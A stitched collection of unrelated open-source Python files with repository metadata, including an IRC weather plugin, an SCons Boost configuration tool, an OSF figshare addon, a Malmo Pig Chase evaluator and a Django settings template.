elif c < 10:
colour = 'light blue'
elif c < 20:
colour = 'light green'
elif c < 30:
colour = 'yellow'
elif c < 40:
colour = 'orange'
else:
colour = 'red'
string = (f'{c}{degree_sign}C')
return ircutils.mircColor(string, colour)
def day(lat, lon):
home = ephem.Observer()
home.lat = ephem.degrees(lat) # str() Latitude
home.lon = ephem.degrees(lon) # str() Longitude
sun = ephem.Sun()
log.info(f'Weatherstack [day]: lat: {home.lat} lon: {home.lon}')
day = ''
try:
next_sunrise = home.next_rising(sun).datetime()
next_sunset = home.next_setting(sun).datetime()
if next_sunset < next_sunrise:
day = True
else:
day = False
except ephem.NeverUpError:
day = False
return day
# XXX Converts decimal degrees to degrees, minutes, and seconds
@lru_cache(maxsize=4) # XXX LRU caching
def dd2dms(longitude, latitude):
# math.modf() splits whole number and decimal into tuple
# eg 53.3478 becomes (0.3478, 53)
split_degx = math.modf(longitude)
# the whole number [index 1] is the degrees
degrees_x = int(split_degx[1])
# multiply the decimal part by 60: 0.3478 * 60 = 20.868
# split the whole number part of the total as the minutes: 20
# abs() absolute value - no negative
minutes_x = abs(int(math.modf(split_degx[0] * 60)[1]))
# multiply the decimal part of the split above by 60 to get the seconds
# 0.868 x 60 = 52.08, round excess decimal places to 2 places
# abs() absolute value - no negative
seconds_x = abs(round(math.modf(split_degx[0] * 60)[0] * 60, 2))
# repeat for latitude
split_degy = math.modf(latitude)
degrees_y = int(split_degy[1])
minutes_y = abs(int(math.modf(split_degy[0] * 60)[1]))
seconds_y = abs(round(math.modf(split_degy[0] * 60)[0] * 60, 2))
# account for E/W & N/S
if degrees_x < 0:
EorW = 'W'
else:
EorW = 'E'
if degrees_y < 0:
NorS = 'S'
else:
NorS = 'N'
# abs() remove negative from degrees, was only needed for if-else above
x = (
str(abs(degrees_x))
+ f'{degree_sign}'
+ str(minutes_x)
+ f'{apostrophe} '
+ str(seconds_x)
+ f'{quotation_mark} '
+ EorW
)
y = (
str(abs(degrees_y))
+ f'{degree_sign}'
+ str(minutes_y)
+ f'{apostrophe} '
+ str(seconds_y)
+ f'{quotation_mark} '
+ NorS
)
return (x, y)
class Weatherstack(callbacks.Plugin):
"""
A simple Weather plugin for Limnoria
using the WeatherStack API
"""
threaded = True
def __init__(self, irc):
self.__parent = super(Weatherstack, self)
self.__parent.__init__(irc)
def format_weather_output(self, response):
"""
Gather all the data - format it
"""
try:
location = response['location']
except KeyError:
raise callbacks.Error('404: city not found')
current = response['current']
city_name = location['name']
region = location['region']
country = location['country']
cr_date = location['localtime']
cr_date = datetime.strptime(cr_date, '%Y-%m-%d %H:%M')
cr_date = cr_date.strftime('%d-%m-%Y %H:%M')
# Convert lat, lon data into Degrees Minutes Seconds
(lon, lat) = dd2dms(int(float(location['lon'])), int(float(location['lat'])))
description = current['weather_descriptions']
atmos = current['pressure']
weather_code = current['weather_code']
# Get the cloud cover percentage
cloud = current['cloudcover']
# Calculate the direction of the positional arrows
arrow = self._get_wind_direction(current['wind_degree'])
precip = current['precip']
humidity = current['humidity']
temp = current['temperature']
feelslike = current['feelslike']
wind = current['wind_speed']
uvi = current['uv_index']
utc = location['utc_offset']
visibility = response['current']['visibility']
uvi_icon = self._format_uvi_icon(uvi)
self.log.info(f'Weatherstack[format_weather_output]: {city_name} lat {lat} lon {lon}')
# Get weather_code from Weatherstack
if not day(location['lat'], location['lon']):
status_icon = '🌚'
else:
status_icon = self._get_status_icon(weather_code)
if precip:
precipico = '☔'
else:
precipico = ''
# Remove unwanted characters from 'weather_descriptions'
description = re.sub('[]\'[]', '', str(description))
# Format output
a = f'🏠 {city_name} {region} {country} :: Lat {lat} Lon {lon} :: UTC {utc} :: {cr_date} :: {status_icon} {description} '
b = f'| 🌡 Barometric {atmos}hPa | ☁ Cloud cover {cloud}{percent_sign} | {precipico} Precip {precip}mm/h '
c = f'| 💦 Humidity {humidity}{percent_sign} | Current {colour(temp)} '
d = f'| Feels like {colour(feelslike)} | 🍃 Wind {wind}Km/H {arrow} '
e = f'| 👁 Visibility {visibility}Km | UVI {uvi} {uvi_icon}'
s = ""
seq = [a, b, c, d, e]
return s.join(seq)
@staticmethod
def _format_uvi_icon(uvi):
"""
Diplays a coloured icon relevant to the UV Index meter.
Low: Green Moderate: Yellow High: Orange Very High: Red
Extreme: Violet 🥵
"""
ico = float(uvi)
if ico >= 0 and ico <= 2.9:
icon = '🟢'
elif ico >= 2 and ico <= 5.9:
icon = '🟡'
elif ico >= 5 and ico <= 7.9:
icon = '🟠'
elif ico >= 7 and ico <= 10.9:
icon = '🔴'
else:
icon = '🟣'
return icon
@lru_cache(maxsize=4) # XXX LRU caching
def get_location_by_location(self, latitude, longitude):
"""
This function returns a location from a reverse lookup.
"""
apikey = self.registryValue("positionstackAPI")
# Missing API Key.
if not apikey:
raise callbacks.Error(
'Please configure the positionstack API key in config plugins.Weatherstack.positionstackAPI'
)
coordinates = f'{latitude}, {longitude}'
params = {'access_key': apikey, 'query': coordinates, 'limit': '1'}
r = requests.get('http://api.positionstack.com/v1/reverse', params)
responses = r.json()
try:
locality = responses['data'][0].get('locality')
except KeyError:
raise callbacks.Error('404: city not found')
self.log.info(
f'WeatherStack: get_location_by_location {locality}: {latitude},{longitude}'
)
return locality
# Select the appropriate weather status icon
@staticmethod
def _get_status_icon(code):
"""
Use the given code to attach appropriate
weather status icon
"""
code = str(code)
switcher = {
'113': '☀️',
'116': '🌤',
'119': '☁',
'122': '☁',
'143': '🌫️',
'176': '🌧',
'179': '🌨️',
'182': '🌨️',
'185': '☔',
'200': '⛈️',
'227': '💨',
'230': '🌬️',
'248': '🌫️',
'260': '🌫️',
'263': '🌧️',
'266': '🌦',
'281': '🌧️',
'284': '🌧️',
'293': '🌧',
'296': '🌧',
'299': '🌧',
'302': '🌧',
'305': '🌧️',
'326': '🌨',
'329': '❄',
'353': '🌧',
'356': '🌧',
'371': '❄',
'389': '⛈'
}
return switcher.get(code, "🤷")
@staticmethod
def _get_wind_direction(degrees):
"""Calculate wind direction"""
num = degrees
val = int((num/22.5)+.5)
# Decorated output
arr = [
'↑ N',
'NNE',
'↗ NE',
'ENE',
'→ E',
'ESE',
'↘ SE',
'SSE',
'↓ S',
'SSW',
'↙ SW',
'WSW',
'← W',
'WNW',
'↖ NW',
'NNW'
]
return arr[(val % 16)]
@lru_cache(maxsize=4) # XXX LRU caching
def query_postal_code(self, code):
"""
This function returns longitude and latitude from
a postcode."""
postcode = code.split(',', 1)[0]
try:
countrycode = re.sub('[ ]', '', code.split(',', 1)[1])
except IndexError:
raise callbacks.Error('postcode, country code>')
try:
nomi = pgeocode.Nominatim(countrycode)
except ValueError:
raise callbacks.Error(f'{countrycode} is not a known country code.')
zip = nomi.query_postal_code(postcode)
self.log.info(f'Weatherstack: query_postal_code: {zip.latitude} {zip.longitude}')
return [zip.latitude, zip.longitude]
@wrap(["text"])
def weather(self, irc, msg, args, location):
"""
Get weather information for a town or city.
[<city> <country code or country>] ][<postcode, country code>]
I.E. weather Ballarat or Ballarat, AU/Australia OR 3350, AU
"""
location = location.lower()
apikey = self.registryValue('weatherstackAPI')
# Missing API Key.
if not apikey:
raise callbacks.Error(
'Please configure the Weatherstack API key in config plugins.Weatherstack.weatherstackAPI'
)
# Not 'enabled' in #channel.
if not self.registryValue('enable', msg.channel, irc.network):
return
self.log.info(f'WeatherStack: running on {irc.network}/{msg.channel}')
# Check if 'location' is a postcode.
if contains_number(location):
(lat, lon) = self.query_postal_code(location)
location = self.get_location_by_location(lat, lon)
# Initialise API data
params = {'access_key': apikey, 'query': location, 'units': 'm'}
try:
api_result = requests.get('http://api.weatherstack.com/current', params)
# If the response was successful, no Exception will be raised
api_result.raise_for_status()
except HTTPError as http_err:
self.log.error(f'Weather: HTTP error occurred: {http_err}', exc_info=True)
raise callbacks.Error(f'Weather: HTTP error occurred: {http_err}')
except Exception as err:
self.log.error(f'Weather: an error occurred: {err}', exc_info=True)
raise callbacks.Error(f'Weather: an error occurred: {err}')
else:
api_response = api_result.json() # Data collection
# Print the weather output
irc.reply(self.format_weather_output(api_response))
@wrap(["something"])
def help(self, irc):
"""418: I\'m a teapot"""
Class = Weatherstack
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| {
"content_hash": "0a26f6bf3b536dd39fb5e491f66483e7",
"timestamp": "",
"source": "github",
"line_count": 406,
"max_line_length": 128,
"avg_line_length": 30.376847290640395,
"alnum_prop": 0.5339333495499878,
"repo_name": "Alcheri/Plugins",
"id": "8677f52a8297c6edf20f2291543cbad42a9bb933",
"size": "14075",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Weatherstack/plugin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "86460"
}
],
"symlink_target": ""
} |
from functools import partial
MINVERSION = '1.54.0'
def exists(env):
# we suppose the tool is always available
return True
def BjamSupported(context):
text = 'Checking for ${BJAM_BIN} ...'
instruction = '${BJAM_BIN} -v'
context.Message(context.env.subst(text))
ret = context.TryAction(instruction)[0]
context.Result(ret == 1)
return ret == 1
VERSION_TEMPLATE='''
#include <boost/version.hpp>
#if BOOST_VERSION < %d
#error Installed boost version is too old!
#endif
int main() {
return 0;
}
'''
def BoostVersionCheck(context, version = MINVERSION):
context.Message('Checking for boost version %s... ' % version)
v_arr = vesion.split('.')
v_num = 0
if len(v_arr) > 0:
v_num += int(v_arr[0]) * 100000
if len(v_arr) > 1:
v_num += int(v_arr[1]) * 100
if len(v_arr) > 2:
v_num += int(v_arr[2])
ret = context.TryCompile(VERSION_TEMPLATE % v_num, '.cpp')
context.Result(ret)
return ret
# libs supported so far by FindBoostLibrary
SUPPORTED = [
''
]
def FindBoostLibrary(env, conf, name, version=None):
'''
This method will try to find a name boost library
'''
if name not in SUPPORTED:
raise Exception, 'boost-%s not supported by this tool yet' % name
if 'ld' not in env['LINK']:
raise Exception, 'Only gcc linker is supported by this tool'
base = 'boost_%s' % name
conf.env['BOOST_PREFIX'] = ''
conf.env['BOOST_LIB'] = base
conf.env['BOOST_SUFFIX'] = ''
if version is not None:
conf.env['BOOST_PREFIX'] = ':${SHLIBPREFIX}'
conf.env['BOOST_SUFFIX'] = '${SHLIBSUFFIX}.%s' % version
lib = '${BOOST_PREFIX}${BOOST_LIB}${BOOST_SUFFIX}'
if conf.TryLink(lib):
return conf.env.subst(lib)
def generate(env):
from SCons import SConf
SConfBase = SConf.SConfBase
if not env.has_key('BJAM_BIN'):
env['BJAM_BIN'] = 'bjam'
class BoostSConfBase(SConfBase):
def __init__(self, env, custom_tests = {}, *a, **kw):
my_tests = {
'BjamSupported': BjamSupported,
'BoostVersionCheck': BoostVersionCheck,
}
my_tests.update(custom_tests)
SConfBase.__init__(self, env, my_tests, *a, **kw)
setattr(SConf, 'SConfBase', BoostSConfBase)
env.AddMethod(FindBoostLibrary)
| {
"content_hash": "05a8b6cdab59c710b7432ff2582cb676",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 73,
"avg_line_length": 25.923076923076923,
"alnum_prop": 0.6019499788045782,
"repo_name": "manuelnaranjo/scons-boost-config",
"id": "a53bbc00d9466280f141556b4e520e941b6f6fad",
"size": "3072",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3072"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from google.cloud.language_v1 import LanguageServiceClient
from google.cloud.language_v1 import enums
from google.cloud.language_v1 import types
__all__ = ("enums", "types", "LanguageServiceClient")
| {
"content_hash": "71869f53138b6500b6499bf1c1d494f1",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 58,
"avg_line_length": 34.285714285714285,
"alnum_prop": 0.7833333333333333,
"repo_name": "tswast/google-cloud-python",
"id": "624bd11943917416fa514a75df951b2349004c19",
"size": "837",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "language/google/cloud/language.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1094"
},
{
"name": "Python",
"bytes": "33785371"
},
{
"name": "Shell",
"bytes": "9148"
}
],
"symlink_target": ""
} |
from asposebarcode import Settings
from com.aspose.barcode import BarCodeBuilder
from com.aspose.barcode import Symbology
class Creating2DBarcode:
def __init__(self):
dataDir = Settings.dataDir + 'WorkingWith2DBarcodes/Basic2DBarcodeFeatures/Creating2DBarcode'
# Instantiate barcode object
builder = BarCodeBuilder()
symbology= Symbology
builder.setSymbologyType(symbology.Pdf417)
# Width of each module
builder.setxDimension(0.6)
# Height of each module
builder.setyDimension(1.2)
builder.setCodeText("this is some test code text. \n Second line \n third line.")
# Save the image to your system and set its image format to Jpeg
builder.save(dataDir + "Creating2DBarcode.jpg")
# Display Status
print "Created 2D Barcode Successfully."
if __name__ == '__main__':
Creating2DBarcode() | {
"content_hash": "91844ea6f1e20c89115d6f47696e0c5e",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 101,
"avg_line_length": 30.193548387096776,
"alnum_prop": 0.6655982905982906,
"repo_name": "aspose-barcode/Aspose.BarCode-for-Java",
"id": "3bced2eb37762f353a3716521306f0c0b816aa36",
"size": "936",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Plugins/Aspose.BarCode Java for Jython/asposebarcode/WorkingWith2DBarcodes/Basic2DBarcodeFeatures/Creating2DBarcode.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "7424"
},
{
"name": "Java",
"bytes": "392091"
},
{
"name": "PHP",
"bytes": "53227"
},
{
"name": "Python",
"bytes": "42629"
},
{
"name": "Ruby",
"bytes": "47116"
}
],
"symlink_target": ""
} |
import os
import pandas as pd
import numpy as np
import xlrd
import xlwt
import matplotlib.pyplot as plt
from pandas.tools.plotting import scatter_matrix
##########################################################################
## Module Constants
##########################################################################
DIRNAME = os.path.dirname(__file__)
DATAPATH = os.path.join(DIRNAME, 'CapBikeDataLogUpdate.xlsx')
OUTPATH = os.path.join(DIRNAME, 'CapBikeCross.xls')
##########################################################################
## Program calculates the correlations of all the variables and outputs to excel file.
##########################################################################
if __name__== "__main__":
#Import the data frame
df = pd.read_excel(DATAPATH,index_col=0)
#print df.head()
#Get the labels for rows and columns
Var_List = list(df.columns.values)[0:]
#Create a numpy array from the dataframe
Arr = np.array(df)
#print Arr.shape
#Transpose the numpy array for correlation coefficient computation
Arr = np.transpose(Arr)
#print Arr.shape
#Compute the correlation coefficients
Corr = np.corrcoef(Arr)
#Create a dataframe of the array of correlation coefficients
new_df = pd.DataFrame(Corr, index=Var_List, columns=Var_List )
#Send the dataframe of correlation coefficients to an excel file
new_df.to_excel(OUTPATH)
#print new_df.head()
| {
"content_hash": "09f2f4e1cee4939d9a38ee7be695afc1",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 86,
"avg_line_length": 28.93877551020408,
"alnum_prop": 0.5853314527503526,
"repo_name": "georgetown-analytics/bike-psychics",
"id": "990ca06763c6e45cde4a68b97e26bf14a2b7417a",
"size": "1658",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "GitCapBikeCross.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24268"
}
],
"symlink_target": ""
} |
from extreme_deconvolution import extreme_deconvolution | {
"content_hash": "897f6bfcb40d345c98e61f18bd59db7c",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 55,
"avg_line_length": 55,
"alnum_prop": 0.9090909090909091,
"repo_name": "gaow/extreme-deconvolution",
"id": "c168249dac2bfe1f169d1dd8b91bf61b2923441b",
"size": "55",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "py/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "67939"
},
{
"name": "IDL",
"bytes": "20989"
},
{
"name": "Makefile",
"bytes": "5529"
},
{
"name": "Python",
"bytes": "42817"
},
{
"name": "R",
"bytes": "10529"
}
],
"symlink_target": ""
} |
import markupsafe
from addons.base.models import (BaseOAuthNodeSettings, BaseOAuthUserSettings,
BaseStorageAddon)
from django.db import models
from framework.auth import Auth
from framework.exceptions import HTTPError
from osf.models.external import ExternalProvider
from osf.models.files import File, Folder, FileVersion, BaseFileNode
from addons.base import exceptions
from addons.figshare import settings as figshare_settings
from addons.figshare import messages
from addons.figshare.client import FigshareClient
from addons.figshare.serializer import FigshareSerializer
class FigshareFileNode(BaseFileNode):
_provider = 'figshare'
class FigshareFolder(FigshareFileNode, Folder):
pass
class FigshareFile(FigshareFileNode, File):
version_identifier = 'ref'
def touch(self, bearer, revision=None, **kwargs):
return super(FigshareFile, self).touch(bearer, revision=None, **kwargs)
def update(self, revision, data, user=None):
"""Figshare does not support versioning.
Always pass revision as None to avoid conflict.
"""
self.name = data['name']
self.materialized_path = data['materialized']
self.save()
version = FileVersion(identifier=None)
version.update_metadata(data, save=False)
# Draft files are not renderable
if data['extra']['status'] == 'drafts':
return (version, u'''
<style>
.file-download{{display: none;}}
.file-share{{display: none;}}
</style>
<div class="alert alert-info" role="alert">
The file "{name}" is still a draft on figshare. <br>
To view it on the OSF
<a href="https://support.figshare.com/support/solutions">publish</a>
it on figshare.
</div>
'''.format(name=markupsafe.escape(self.name)))
return version
class FigshareProvider(ExternalProvider):
name = 'figshare'
short_name = 'figshare'
client_id = figshare_settings.CLIENT_ID
client_secret = figshare_settings.CLIENT_SECRET
auth_url_base = figshare_settings.FIGSHARE_OAUTH_AUTH_ENDPOINT
callback_url = figshare_settings.FIGSHARE_OAUTH_TOKEN_ENDPOINT
auto_refresh_url = callback_url
# refresh_time = settings.REFRESH_TIME # TODO: maybe
# expiry_time = settings.EXPIRY_TIME
default_scopes = ['all']
def handle_callback(self, response):
"""View called when the Oauth flow is completed. Adds a new BoxUserSettings
record to the user and saves the user's access token and account info.
"""
client = FigshareClient(response['access_token'])
about = client.userinfo()
return {
'provider_id': about['id'],
'display_name': '{} {}'.format(about['first_name'], about.get('last_name')),
}
class UserSettings(BaseStorageAddon, BaseOAuthUserSettings):
"""Stores user-specific figshare information
"""
oauth_provider = FigshareProvider
serializer = FigshareSerializer
class NodeSettings(BaseStorageAddon, BaseOAuthNodeSettings):
oauth_provider = FigshareProvider
serializer = FigshareSerializer
folder_id = models.TextField(blank=True, null=True)
folder_name = models.TextField(blank=True, null=True)
folder_path = models.TextField(blank=True, null=True)
user_settings = models.ForeignKey(UserSettings, null=True, blank=True)
_api = None
@property
def api(self):
"""authenticated ExternalProvider instance"""
if self._api is None:
self._api = FigshareProvider(self.external_account)
return self._api
def fetch_folder_name(self):
return u'{0}:{1}'.format(self.folder_name or 'Unnamed {0}'.format(self.folder_path or ''), self.folder_id)
def fetch_full_folder_path(self):
return self.folder_name
def get_folders(self, **kwargs):
return FigshareClient(self.external_account.oauth_key).get_folders()
def archive_errors(self):
items = []
if self.folder_path in ('article', 'fileset'):
article = FigshareClient(self.external_account.oauth_key).article(self.folder_id)
items = [article]
else:
project = FigshareClient(self.external_account.oauth_key).project(self.folder_id)
items = project['articles'] if project else []
private = any(
[item for item in items if item['status'].lower() != 'public']
)
if private:
return 'The figshare {folder_path} <strong>{folder_name}</strong> contains private content that we cannot copy to the registration. If this content is made public on figshare we should then be able to copy those files. You can view those files <a href="{url}" target="_blank">here.</a>'.format(
folder_path=markupsafe.escape(self.folder_path),
folder_name=markupsafe.escape(self.folder_name),
url=self.owner.web_url_for('collect_file_trees'))
def clear_settings(self):
self.folder_id = None
self.folder_name = None
self.folder_path = None
def deauthorize(self, auth=None, add_log=True):
"""Remove user authorization from this node and log the event."""
self.clear_settings()
if add_log:
self.nodelogger.log(action='node_deauthorized', save=True)
self.clear_auth()
def serialize_waterbutler_credentials(self):
if not self.has_auth:
raise exceptions.AddonError('Addon is not authorized')
try:
# FigshareProvider(self.external_account).refresh_oauth_key() # TODO: Maybe
return {'token': self.external_account.oauth_key}
except Exception as error: # TODO: specific exception
raise HTTPError(error.status_code, data={'message_long': error.message})
def serialize_waterbutler_settings(self):
if not self.folder_path or not self.folder_id:
raise exceptions.AddonError('Folder is not configured')
return {
'container_type': self.folder_path,
'container_id': str(self.folder_id),
}
def create_waterbutler_log(self, auth, action, metadata):
url = self.owner.web_url_for('addon_view_or_download_file', path=metadata['path'], provider='figshare')
self.owner.add_log(
'figshare_{0}'.format(action),
auth=auth,
params={
'project': self.owner.parent_id,
'node': self.owner._id,
'path': metadata['materialized'],
'filename': metadata['materialized'].strip('/'),
'urls': {
'view': url,
'download': url + '?action=download'
},
},
)
def set_folder(self, folder_id, auth):
try:
info = FigshareClient(self.external_account.oauth_key).get_linked_folder_info(folder_id)
except HTTPError as e:
raise exceptions.InvalidFolderError(e.message)
self.folder_id = info['id']
self.folder_name = info['name']
self.folder_path = info['path']
self.save()
self.nodelogger.log(action='folder_selected', save=True)
#############
# Callbacks #
#############
def after_delete(self, node=None, user=None):
self.deauthorize(Auth(user=user), add_log=True)
self.save()
def on_delete(self):
self.deauthorize(add_log=False)
self.save()
def before_page_load(self, node, user):
"""
:param Node node:
:param User user:
:return str: Alert message
"""
if not self.configured:
return []
figshare = node.get_addon('figshare')
# Quit if no user authorization
node_permissions = 'public' if node.is_public else 'private'
if figshare.folder_path == 'project':
if node_permissions == 'private':
message = messages.BEFORE_PAGE_LOAD_PRIVATE_NODE_MIXED_FS.format(category=node.project_or_component, project_id=figshare.folder_id)
return [message]
else:
message = messages.BEFORE_PAGE_LOAD_PUBLIC_NODE_MIXED_FS.format(category=node.project_or_component, project_id=figshare.folder_id)
connect = FigshareClient(self.external_account.oauth_key)
try:
project_is_public = connect.container_is_public(self.folder_id, self.folder_path)
except HTTPError as e:
if e.code == 403:
return [messages.OAUTH_INVALID]
elif e.code == 500:
return [messages.FIGSHARE_INTERNAL_SERVER_ERROR]
else:
return [messages.FIGSHARE_UNSPECIFIED_ERROR.format(error_message=e.message)]
article_permissions = 'public' if project_is_public else 'private'
if article_permissions != node_permissions:
message = messages.BEFORE_PAGE_LOAD_PERM_MISMATCH.format(
category=node.project_or_component,
node_perm=node_permissions,
figshare_perm=article_permissions,
figshare_id=self.folder_id,
folder_type=self.folder_path,
)
if article_permissions == 'private' and node_permissions == 'public':
message += messages.BEFORE_PAGE_LOAD_PUBLIC_NODE_PRIVATE_FS.format(folder_type=self.folder_path)
# No HTML snippets, so escape message all at once
return [markupsafe.escape(message)]
| {
"content_hash": "e9560f0376405ec04e3d8170724a84ea",
"timestamp": "",
"source": "github",
"line_count": 254,
"max_line_length": 306,
"avg_line_length": 37.92913385826772,
"alnum_prop": 0.623417064563006,
"repo_name": "chrisseto/osf.io",
"id": "63797abe77ebb85c7652cd2d441c9acd3ab7a7ed",
"size": "9659",
"binary": false,
"copies": "2",
"ref": "refs/heads/feature/reviews",
"path": "addons/figshare/models.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "144093"
},
{
"name": "HTML",
"bytes": "211713"
},
{
"name": "JavaScript",
"bytes": "1740074"
},
{
"name": "Mako",
"bytes": "592713"
},
{
"name": "Perl",
"bytes": "13885"
},
{
"name": "Python",
"bytes": "7895181"
}
],
"symlink_target": ""
} |
"""
================================================================================
Modifications:
Run just agent_100k
Save reward / step
Run for 500 Epoch
Save file result file directly to
================================================================================
"""
import os
import sys
from time import sleep
from common import parse_clients_args, ENV_AGENT_NAMES
from agent import PigChaseChallengeAgent
from common import ENV_AGENT_NAMES
from environment import PigChaseEnvironment, PigChaseSymbolicStateBuilder
# Enforce path
sys.path.insert(0, os.getcwd())
sys.path.insert(1, os.path.join(os.path.pardir, os.getcwd()))
class PigChaseEvaluator(object):
def __init__(self, clients, agent_100k, agent_500k, state_builder):
assert len(clients) >= 2, 'Not enough clients provided'
self._clients = clients
self._agent_100k = agent_100k
self._agent_500k = agent_500k
print('======================================================')
print("\n\nWill run experiment only for model of 'agent_100k'! \n\n")
print('======================================================')
self._state_builder = state_builder
self._accumulators = {'100k': []}
def save(self, experiment_name, filepath):
"""
Save the evaluation results in a JSON file
understandable by the leaderboard.
Note: The leaderboard will not accept a submission if you already
uploaded a file with the same experiment name.
:param experiment_name: An identifier for the experiment
:param filepath: Path where to store the results file
:return:
"""
assert experiment_name is not None, 'experiment_name cannot be None'
from json import dump
from os.path import exists, join, pardir, abspath
# Compute metrics
metrics = {key: {"info": buffer}
for key, buffer in self._accumulators.items()}
metrics['experimentname'] = experiment_name
try:
filepath = abspath(filepath)
with open(filepath, 'w') as f_out:
dump(metrics, f_out)
print('==================================')
print('Evaluation done, results written at %s' % filepath)
except Exception as e:
print('Unable to save the results: %s' % e)
def run(self):
from multiprocessing import Process
env = PigChaseEnvironment(self._clients, self._state_builder,
role=1, randomize_positions=True)
print('==================================')
print('Starting evaluation of Agent @100k')
p = Process(target=run_challenge_agent, args=(self._clients,))
p.start()
sleep(5)
agent_loop(self._agent_100k, env, self._accumulators['100k'])
p.terminate()
# print('==================================')
# print('Starting evaluation of Agent @500k')
#
# p = Process(target=run_challenge_agent, args=(self._clients,))
# p.start()
# sleep(5)
# agent_loop(self._agent_500k, env, self._accumulators['500k'])
# p.terminate()
def run_challenge_agent(clients):
builder = PigChaseSymbolicStateBuilder()
env = PigChaseEnvironment(clients, builder, role=0,
randomize_positions=True)
agent = PigChaseChallengeAgent(ENV_AGENT_NAMES[0])
agent_loop(agent, env, None)
def agent_loop(agent, env, metrics_acc):
EVAL_EPISODES = 500
agent_done = False
reward = 0
episode = 0
obs = env.reset()
step = 0
while episode < EVAL_EPISODES:
# check if env needs reset
if env.done:
print('Episode %d (%.2f)%%' % (
episode, (episode / EVAL_EPISODES) * 100.))
obs = env.reset()
while obs is None:
# this can happen if the episode ended with the first
# action of the other agent
print('Warning: received obs == None.')
obs = env.reset()
episode += 1
step = 0
# select an action
action = agent.act(obs, reward, agent_done, is_training=True)
# take a step
obs, reward, agent_done = env.do(action)
if metrics_acc is not None:
metrics_acc.append((episode, step, reward))
step += 1
| {
"content_hash": "6d9f86e479beb540344b9adcd9935a24",
"timestamp": "",
"source": "github",
"line_count": 138,
"max_line_length": 80,
"avg_line_length": 32.11594202898551,
"alnum_prop": 0.5453519855595668,
"repo_name": "village-people/flying-pig",
"id": "39ba2075cdcf5afca989cc8a0260b57bd6b8704f",
"size": "5646",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ai_challenge/pig_chase/evaluation_save_full.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "370890"
},
{
"name": "Shell",
"bytes": "67"
},
{
"name": "XSLT",
"bytes": "372375"
}
],
"symlink_target": ""
} |
class Solution:
# @param root, a tree node
# @return a boolean
def isValidBST(self, root):
self.prev = None
return self.is_valid_bst_aux(root)
def is_valid_bst_aux(self, root):
if root is None:
return True
else:
if not self.is_valid_bst_aux(root.left):
return False
if self.prev is not None:
if self.prev.val >= root.val:
return False
self.prev = root
if not self.is_valid_bst_aux(root.right):
return False
return True
| {
"content_hash": "6070a7bfd0038a4057a9a4c95ee28f6c",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 53,
"avg_line_length": 30.4,
"alnum_prop": 0.5098684210526315,
"repo_name": "JiaminXuan/leetcode-python",
"id": "795a90f9abed626d2eb5001d217af76b19740b9a",
"size": "771",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "validate_binary_search_tree/solution3.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "133317"
},
{
"name": "Shell",
"bytes": "353"
}
],
"symlink_target": ""
} |
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.9.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@w$i9&1blz%(h_kx4qsoq_2e11l#z9%=7+aseo1xdb-8^b-(b5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, "templates")],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
